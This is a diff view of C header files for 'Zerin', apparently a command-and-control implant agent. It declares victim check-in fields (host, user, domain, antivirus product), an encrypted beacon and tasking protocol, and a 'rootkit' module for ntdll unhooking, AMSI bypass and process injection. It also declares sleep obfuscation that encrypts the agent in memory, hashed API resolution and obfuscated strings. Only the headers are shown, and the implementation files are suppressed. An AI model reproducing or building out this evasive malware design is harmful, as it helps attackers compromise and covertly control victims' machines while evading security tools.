#define HASH_VirtualProtect 0xc0ea3c33
|
||||
#define HASH_EtwEventWrite 0xf0315e08
|
||||
|
||||
#endif // POLY_HASH_H
|
||||
Executable
+145
@@ -0,0 +1,145 @@
|
||||
#ifndef ZERIN_PROTOCOL_H
|
||||
#define ZERIN_PROTOCOL_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
#include <stdbool.h>
|
||||
|
||||
// ============================================================================
|
||||
// Serialization buffer
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
uint8_t *data;
|
||||
size_t len;
|
||||
size_t cap;
|
||||
size_t pos; // Read cursor
|
||||
} buffer_t;
|
||||
|
||||
buffer_t *buffer_new(size_t initial_cap);
|
||||
void buffer_free(buffer_t *buf);
|
||||
int buffer_write_u8(buffer_t *buf, uint8_t val);
|
||||
int buffer_write_u32(buffer_t *buf, uint32_t val);
|
||||
int buffer_write_u64(buffer_t *buf, uint64_t val);
|
||||
int buffer_write_i64(buffer_t *buf, int64_t val);
|
||||
int buffer_write_bytes(buffer_t *buf, const uint8_t *data, size_t len);
|
||||
int buffer_write_string(buffer_t *buf, const char *str);
|
||||
|
||||
int buffer_read_u8(buffer_t *buf, uint8_t *val);
|
||||
int buffer_read_u32(buffer_t *buf, uint32_t *val);
|
||||
int buffer_read_u64(buffer_t *buf, uint64_t *val);
|
||||
int buffer_read_i64(buffer_t *buf, int64_t *val);
|
||||
int buffer_read_bytes(buffer_t *buf, uint8_t **data, size_t *len);
|
||||
int buffer_read_string(buffer_t *buf, char **str);
|
||||
|
||||
// ============================================================================
|
||||
// CheckIn message
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
char agent_id[37];
|
||||
char hostname[256];
|
||||
char username[256];
|
||||
char domain[256];
|
||||
char internal_ip[64];
|
||||
uint32_t pid;
|
||||
uint32_t ppid;
|
||||
char os_version[256];
|
||||
char arch[8];
|
||||
char process_name[260];
|
||||
bool elevated;
|
||||
uint32_t integrity_level;
|
||||
uint32_t sleep_interval;
|
||||
uint32_t jitter_percent;
|
||||
int64_t kill_date;
|
||||
char av_product[128];
|
||||
} checkin_t;
|
||||
|
||||
int checkin_serialize(const checkin_t *ci, buffer_t *buf);
|
||||
int checkin_deserialize(buffer_t *buf, checkin_t *ci);
|
||||
|
||||
// ============================================================================
|
||||
// Envelope (wraps all beacon messages)
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
uint32_t message_type;
|
||||
uint64_t sequence_number;
|
||||
char agent_id[37];
|
||||
int64_t timestamp;
|
||||
uint8_t *payload;
|
||||
size_t payload_len;
|
||||
} envelope_t;
|
||||
|
||||
int envelope_serialize(const envelope_t *env, buffer_t *buf);
|
||||
int envelope_deserialize(buffer_t *buf, envelope_t *env);
|
||||
|
||||
// ============================================================================
|
||||
// Task
|
||||
// ============================================================================
|
||||
#define TASK_MAX_ARGS 32
|
||||
|
||||
typedef struct {
|
||||
char task_id[37];
|
||||
char command[64];
|
||||
char *args[TASK_MAX_ARGS];
|
||||
uint32_t num_args;
|
||||
uint8_t *data;
|
||||
size_t data_len;
|
||||
uint32_t timeout;
|
||||
} task_t;
|
||||
|
||||
int task_deserialize(buffer_t *buf, task_t *task);
|
||||
void task_free(task_t *task);
|
||||
|
||||
// ============================================================================
|
||||
// TaskResult
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
char task_id[37];
|
||||
bool success;
|
||||
char *output;
|
||||
uint8_t *data;
|
||||
size_t data_len;
|
||||
int32_t error_code;
|
||||
char *error_message;
|
||||
} task_result_t;
|
||||
|
||||
int task_result_serialize(const task_result_t *result, buffer_t *buf);
|
||||
void task_result_free(task_result_t *result);
|
||||
|
||||
// ============================================================================
|
||||
// TaskResponse (server → agent: list of tasks)
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
task_t *tasks;
|
||||
uint32_t num_tasks;
|
||||
} task_response_t;
|
||||
|
||||
int task_response_deserialize(buffer_t *buf, task_response_t *resp);
|
||||
void task_response_free(task_response_t *resp);
|
||||
|
||||
// ============================================================================
|
||||
// Key Exchange wire format
|
||||
// ============================================================================
|
||||
int protocol_build_key_exchange(const uint8_t pubkey_hash[32],
|
||||
const uint8_t ephemeral_pub[32],
|
||||
const uint8_t *encrypted_checkin,
|
||||
size_t encrypted_len,
|
||||
const uint8_t nonce[12],
|
||||
uint8_t **out, size_t *out_len);
|
||||
|
||||
int protocol_parse_key_exchange_response(const uint8_t *data, size_t data_len,
|
||||
uint8_t **encrypted_payload,
|
||||
size_t *encrypted_len,
|
||||
uint8_t nonce[12]);
|
||||
|
||||
// ============================================================================
|
||||
// Beacon wire format (encrypted envelope)
|
||||
// ============================================================================
|
||||
int protocol_build_beacon(const uint8_t session_key[32],
|
||||
const envelope_t *env,
|
||||
uint8_t **out, size_t *out_len);
|
||||
|
||||
int protocol_parse_beacon_response(const uint8_t session_key[32],
|
||||
const uint8_t *data, size_t data_len,
|
||||
envelope_t *env);
|
||||
|
||||
#endif // ZERIN_PROTOCOL_H
|
||||
Executable
+40
@@ -0,0 +1,40 @@
|
||||
#ifndef ZERIN_ROOTKIT_H
|
||||
#define ZERIN_ROOTKIT_H
|
||||
|
||||
#include "config.h"
|
||||
#include <stdint.h>
|
||||
|
||||
#ifdef _WIN32
|
||||
|
||||
// Initialize rootkit subsystems (unhook, AMSI bypass — no injection yet)
|
||||
int rootkit_init(zerin_config_t *cfg);
|
||||
|
||||
// Start injection (call AFTER first successful beacon)
|
||||
int rootkit_start_injection(void);
|
||||
|
||||
// Cleanup rootkit state
|
||||
void rootkit_cleanup(void);
|
||||
|
||||
// Individual subsystems
|
||||
int rootkit_unhook_ntdll(void);
|
||||
int rootkit_bypass_amsi(void);
|
||||
|
||||
// Injection engine
|
||||
int rootkit_inject_all(void);
|
||||
int rootkit_inject_pid(uint32_t pid);
|
||||
int rootkit_start_monitor(void);
|
||||
void rootkit_stop_monitor(void);
|
||||
|
||||
// Shared memory listener (NtResumeThread IPC — primary new-process mechanism)
|
||||
int rootkit_start_shm_listener(void);
|
||||
void rootkit_stop_shm_listener(void);
|
||||
|
||||
// Status reporting
|
||||
int rootkit_get_status(char *buf, size_t buf_size);
|
||||
|
||||
// State tracking
|
||||
extern volatile LONG g_rootkit_active;
|
||||
extern volatile LONG g_rootkit_injected_count;
|
||||
|
||||
#endif // _WIN32
|
||||
#endif // ZERIN_ROOTKIT_H
|
||||
Executable
+14
@@ -0,0 +1,14 @@
|
||||
#ifndef ZERIN_SLEEP_OBF_H
|
||||
#define ZERIN_SLEEP_OBF_H
|
||||
|
||||
#include <stdint.h>
|
||||
|
||||
// Obfuscated sleep: encrypts the agent's image in memory during the
|
||||
// sleep interval using XOR with the provided key, then decrypts on wake.
|
||||
// Falls back to a plain Sleep() if setup fails.
|
||||
//
|
||||
// ms — sleep duration in milliseconds
|
||||
// key — 32-byte encryption key (typically the session key)
|
||||
int sleep_obfuscated(uint32_t ms, const uint8_t *key);
|
||||
|
||||
#endif // ZERIN_SLEEP_OBF_H
|
||||
Executable
+1724
File diff suppressed because it is too large
Load Diff
Executable
+10
@@ -0,0 +1,10 @@
|
||||
#ifndef ZERIN_STRINGS_H
|
||||
#define ZERIN_STRINGS_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
|
||||
/* ChaCha20-based obfuscated string system (generated per build) */
|
||||
#include "obf_strings_gen.h"
|
||||
|
||||
#endif /* ZERIN_STRINGS_H */
|
||||
Executable
+24
@@ -0,0 +1,24 @@
|
||||
#ifndef ZERIN_SYSCALLS_H
|
||||
#define ZERIN_SYSCALLS_H
|
||||
|
||||
#ifdef _WIN32
|
||||
|
||||
#include <stdint.h>
|
||||
#include <windows.h>
|
||||
|
||||
// Polymorphic hash algorithm + pre-computed constants (generated per build)
|
||||
#include "poly_hash.h"
|
||||
|
||||
// Walk PEB to find a loaded module by its name hash.
|
||||
void *get_module_by_hash(uint32_t hash);
|
||||
|
||||
// Resolve an exported function from a module by function name hash.
|
||||
FARPROC resolve_api(uint32_t module_hash, uint32_t func_hash);
|
||||
|
||||
// Convenience macro: resolve and cast in one step.
|
||||
// Usage: RESOLVE_API(HASH_KERNEL32, HASH_SomeFunc, FuncPtrType)
|
||||
#define RESOLVE_API(mod_hash, func_hash, type) \
|
||||
((type)resolve_api((mod_hash), (func_hash)))
|
||||
|
||||
#endif // _WIN32
|
||||
#endif // ZERIN_SYSCALLS_H
|
||||
Executable
+41
@@ -0,0 +1,41 @@
|
||||
#ifndef ZERIN_TRANSPORT_H
|
||||
#define ZERIN_TRANSPORT_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
|
||||
// Transport interface — function pointers allow swapping HTTP/DNS/SMB/etc.
|
||||
typedef struct transport transport_t;
|
||||
|
||||
typedef int (*transport_init_fn)(transport_t *t, const char *url, const char *user_agent);
|
||||
typedef int (*transport_send_fn)(transport_t *t, const char *endpoint,
|
||||
const uint8_t *data, size_t data_len,
|
||||
uint8_t **response, size_t *response_len);
|
||||
typedef void (*transport_cleanup_fn)(transport_t *t);
|
||||
|
||||
struct transport {
|
||||
transport_init_fn init;
|
||||
transport_send_fn send;
|
||||
transport_cleanup_fn cleanup;
|
||||
void *ctx; // Implementation-specific context
|
||||
};
|
||||
|
||||
// HTTP/S transport implementation
|
||||
extern transport_t transport_https;
|
||||
|
||||
int http_init(transport_t *t, const char *url, const char *user_agent);
|
||||
int http_send(transport_t *t, const char *endpoint,
|
||||
const uint8_t *data, size_t data_len,
|
||||
uint8_t **response, size_t *response_len);
|
||||
void http_cleanup(transport_t *t);
|
||||
|
||||
// High-level transport functions used by beacon
|
||||
int transport_do_key_exchange(transport_t *t, const char *base_url,
|
||||
const uint8_t *kx_data, size_t kx_len,
|
||||
uint8_t **response, size_t *response_len);
|
||||
|
||||
int transport_do_beacon(transport_t *t, const char *base_url,
|
||||
const uint8_t *beacon_data, size_t beacon_len,
|
||||
uint8_t **response, size_t *response_len);
|
||||
|
||||
#endif // ZERIN_TRANSPORT_H
|
||||
Executable
+2809
File diff suppressed because it is too large
Load Diff
Executable
+79
@@ -0,0 +1,79 @@
|
||||
#ifndef ZERIN_H
|
||||
#define ZERIN_H
|
||||
|
||||
#define ZERIN_VERSION_MAJOR 1
|
||||
#define ZERIN_VERSION_MINOR 0
|
||||
#define ZERIN_VERSION_PATCH 0
|
||||
|
||||
#define ZERIN_MAX_PAYLOAD (1024 * 1024 * 4) // 4 MB max message
|
||||
#define ZERIN_MAX_TASKS 64
|
||||
#define ZERIN_AGENT_ID_LEN 37 // UUID + null
|
||||
#define ZERIN_KEY_SIZE 32
|
||||
#define ZERIN_NONCE_SIZE 12
|
||||
#define ZERIN_TAG_SIZE 16
|
||||
#define ZERIN_SHA256_SIZE 32
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
#include <stdbool.h>
|
||||
|
||||
#ifdef _WIN32
|
||||
#define WIN32_LEAN_AND_MEAN
|
||||
#include <windows.h>
|
||||
#endif
|
||||
|
||||
// Result codes
|
||||
#define ZERIN_OK 0
|
||||
#define ZERIN_ERR_CRYPTO -1
|
||||
#define ZERIN_ERR_TRANSPORT -2
|
||||
#define ZERIN_ERR_PROTOCOL -3
|
||||
#define ZERIN_ERR_CONFIG -4
|
||||
#define ZERIN_ERR_MEMORY -5
|
||||
#define ZERIN_ERR_TIMEOUT -6
|
||||
#define ZERIN_ERR_KILLED -7
|
||||
|
||||
// Message types (matches proto enum)
|
||||
#define MSG_UNKNOWN 0
|
||||
#define MSG_CHECKIN 1
|
||||
#define MSG_CHECKIN_ACK 2
|
||||
#define MSG_TASK_REQUEST 3
|
||||
#define MSG_TASK_RESPONSE 4
|
||||
#define MSG_TASK_RESULT 5
|
||||
#define MSG_HEARTBEAT 6
|
||||
#define MSG_HEARTBEAT_ACK 7
|
||||
#define MSG_EXIT 8
|
||||
|
||||
#include "config.h"
|
||||
#include "crypto.h"
|
||||
#include "transport.h"
|
||||
#include "protocol.h"
|
||||
#include "commands.h"
|
||||
#include "platform.h"
|
||||
#include "evasion.h"
|
||||
|
||||
// Global agent state
|
||||
typedef struct {
|
||||
zerin_config_t config;
|
||||
uint8_t session_key[ZERIN_KEY_SIZE];
|
||||
bool session_established;
|
||||
uint64_t sequence_number;
|
||||
char cwd[MAX_PATH];
|
||||
bool running;
|
||||
} zerin_agent_t;
|
||||
|
||||
// Base64 encoding
|
||||
char *base64_encode(const uint8_t *data, size_t len, size_t *out_len);
|
||||
|
||||
// Core functions
|
||||
int zerin_init(zerin_agent_t *agent);
|
||||
int zerin_key_exchange(zerin_agent_t *agent);
|
||||
int zerin_beacon_loop(zerin_agent_t *agent);
|
||||
void zerin_cleanup(zerin_agent_t *agent);
|
||||
|
||||
// Debug mode (plaintext JSON beacons, no crypto)
|
||||
#ifdef _DEBUG
|
||||
int debug_checkin(zerin_agent_t *agent);
|
||||
int debug_beacon_loop(zerin_agent_t *agent);
|
||||
#endif
|
||||
|
||||
#endif // ZERIN_H
|
||||
Reference in New Issue
Block a user